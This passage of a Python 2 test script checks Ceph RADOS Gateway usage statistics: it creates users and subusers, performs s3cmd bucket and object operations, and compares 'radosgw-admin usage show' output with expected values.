"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict3
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = expect_dict5
expect_dict10 = expect_dict6
expect_dict11 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase15 %s" % (ok_display("OK"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
class TestCase16(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg del s3://test1/user1.s3cfg')
exec_command('s3cmd -c user1.s3cfg rb s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg del s3://test2/subuser1.s3cfg')
exec_command('s3cmd -c subuser1.s3cfg rb s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user2.s3cfg del s3://test01/user2.s3cfg')
exec_command('s3cmd -c user2.s3cfg rb s3://test01')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg del s3://test02/subu01.s3cfg')
exec_command('s3cmd -c subu01.s3cfg rb s3://test02')
time.sleep(30)
def clean(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
exec_based_on_version('radosgw-admin usage trim --uid=user2')
exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
os.chdir(py_dir)
exec_command('rm 14*.txt')
def run(self):
result1 = result2 = result3 = result4 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict3
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = expect_dict5
expect_dict10 = expect_dict6
expect_dict11 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase16 %s" % (ok_display("OK"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
self.clean()
class TestCase17(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def op2(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser1')
os.chdir(py_dir)
def op3(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser2')
os.chdir(py_dir)
def run(self):
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
self.prepare()
self.op1()
result1 = result2 = result3 = False
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = expect_dict1
expect_dict5 = expect_dict3
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict5)
os.chdir(py_dir)
if result1 == result2 == True:
self.op3()
expect_dict6 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict6)
os.chdir(py_dir)
if result1 == True:
print "testcase17 %s" % (ok_display("OK"))
else:
print "testcase17 %s" % (fail_display("FAIL"))
else:
print "testcase17 %s" % (fail_display("FAIL"))
else:
print "testcase17 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c user1.s3cfg rb s3://test2')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
class TestCase18(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
subuser_id = ''
command = ''
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser={subuser} --access=full --access-key={subuser} --secret-key={subuser}'.format(subuser = subuser_id)
exec_based_on_version(command)
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg mb s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser666.s3cfg put user1.s3cfg s3://test2')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c user2.s3cfg mb s3://test3')
time.sleep(30)
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1')
exec_command('s3cmd -c user1.s3cfg rb s3://test2 --recursive')
exec_command('s3cmd -c user2.s3cfg rb s3://test3')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin usage trim --uid=user2')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
os.chdir(py_dir)
def run(self):
result1 = result2 = result3 = result4 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 0}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict2)
subuser_id = ''
command = ''
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
result3 = verify_show_based_on_version(command, expect_dict2)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict5 = expect_dict2
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict5)
for i in range(1, 1001):
if i == 1:
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
else:
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
result3 = verify_show_based_on_version(command, expect_dict5)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict6 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict4
expect_dict8 = {"entries_size": 1,
"user1:subuser666": {"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict9 = expect_dict5
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict6)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict9)
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
if i == 1:
result3 = verify_show_based_on_version(command, expect_dict7)
elif i == 666:
result3 = verify_show_based_on_version(command, expect_dict8)
else:
result3 = verify_show_based_on_version(command, expect_dict9)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op4()
expect_dict10 = expect_dict6
expect_dict11 = expect_dict7
expect_dict12 = expect_dict8
expect_dict13 = {"entries_size": 1,
"user2": {"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict14 = expect_dict9
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict13)
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
if i == 1:
result3 = verify_show_based_on_version(command, expect_dict11)
elif i == 666:
result3 = verify_show_based_on_version(command, expect_dict12)
else:
result3 = verify_show_based_on_version(command, expect_dict14)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase18 %s" % (ok_display("OK"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
self.clean()
class TestCase19(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def run(self):
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
self.prepare()
result1 = result2 = result3 = False
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --categories=put_obj', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1 --categories=put_obj', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2 --categories=put_obj', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {}},
"test2": {"categories": {}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --categories=list_bucket', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1 --categories=list_bucket', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2 --categories=list_bucket', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase19 %s" % (ok_display("OK"))
else:
print "testcase19 %s" % (fail_display("FAIL"))
else:
print "testcase19 %s" % (fail_display("FAIL"))
else:
print "testcase19 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c subuser2.s3cfg rb s3://test2')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
class TestCase20(object):
    """Check that usage records are independent of user/subuser lifecycle.

    After generating traffic, subusers and even the whole user are removed
    and re-created; after every step the ``radosgw-admin usage show``
    output is expected to stay exactly the same (usage is only dropped by
    an explicit ``usage trim``, see clean()).
    """
    def prepare(self):
        """Create user1 with S3 subusers subuser1 and subuser2."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
        os.chdir(py_dir)
    def op1(self):
        """Generate traffic: a bucket + object put by user1/subuser1 and a
        second bucket created by subuser2."""
        exec_command('s3cmd -c user1.s3cfg mb s3://test1')
        exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
        exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
        time.sleep(30)  # allow the usage log to be flushed
    def op2(self):
        """Remove subuser1."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser1')
        os.chdir(py_dir)
    def op3(self):
        """Remove subuser2."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser2')
        os.chdir(py_dir)
    def op4(self):
        """Re-create subuser1 with its original keys."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        os.chdir(py_dir)
    def op5(self):
        """Remove user1 entirely, including data and keys."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
        os.chdir(py_dir)
    def op6(self):
        """Re-create user1."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        os.chdir(py_dir)
    def run(self):
        """After each lifecycle op the same three expectations must hold;
        the expect_dict aliases below make that invariance explicit."""
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 1, "successful_ops": 1}}},
                                  "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        self.prepare()
        self.op1()
        result1 = result2 = result3 = False
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            # Removing subuser1 must not change any usage statistics.
            expect_dict4 = expect_dict1
            expect_dict5 = expect_dict2
            expect_dict6 = expect_dict3
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 == result3 == True:
                self.op3()
                # Removing subuser2 must not change the statistics either.
                expect_dict7 = expect_dict4
                expect_dict8 = expect_dict5
                expect_dict9 = expect_dict6
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 == result3 == True:
                    self.op4()
                    # Re-creating subuser1 keeps the old records.
                    expect_dict10 = expect_dict7
                    expect_dict11 = expect_dict8
                    expect_dict12 = expect_dict9
                    os.chdir(ceph_path)
                    result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
                    result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
                    result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
                    os.chdir(py_dir)
                    if result1 == result2 == result3 == True:
                        self.op5()
                        # Usage records are expected to outlive the user itself.
                        expect_dict13 = expect_dict10
                        expect_dict14 = expect_dict11
                        expect_dict15 = expect_dict12
                        os.chdir(ceph_path)
                        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
                        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
                        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict15)
                        os.chdir(py_dir)
                        if result1 == result2 == result3 == True:
                            self.op6()
                            # Re-creating user1 must reattach the same records.
                            expect_dict16 = expect_dict13
                            expect_dict17 = expect_dict14
                            expect_dict18 = expect_dict15
